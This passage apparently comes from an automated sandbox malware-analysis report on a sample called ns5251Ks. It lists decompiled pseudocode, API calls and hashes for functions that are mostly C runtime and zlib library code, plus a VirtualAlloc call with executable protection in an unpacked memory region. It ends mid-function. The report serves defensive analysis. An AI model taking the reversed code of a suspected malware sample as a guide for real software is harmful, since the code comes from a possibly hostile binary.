Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Function 02E17425 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E17476

Memory Dump Source

Source File: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E16000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e16000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 5bd40365b7727dc81fad74d74d9f24ceb6c930df99464b2ca2274f164d59be8c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D6112779A40208EFDB01DF98C985E99BFF5AF08751F0580A4F9889B361D375EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x7db36a59
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x7db36a59
				_v812 = _t12;
				_t13 =  *0x422238; // 0x824c95a6
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x0040adb3
0x0040adb5
0x0040adb8
0x0040adc0
0x0040adc8
0x0040adc8
0x0040adce
0x0040add0
0x0040add8
0x00000000
0x0040ade1
0x0040add8
0x0040ade8

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 02E17043 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E16000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2e16000_ns5251Ks.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: be45233d9bf1d9c6031c2441f70be14e5151eb5977f72f8c823427a28c1c351f
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: E51182723802009FD754DF65DC80FA6B3EAFB89724B1980A5ED08CB356D775E841C760

Uniqueness

Uniqueness Score: -1.00%

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x7db36a59
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02D418C0), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
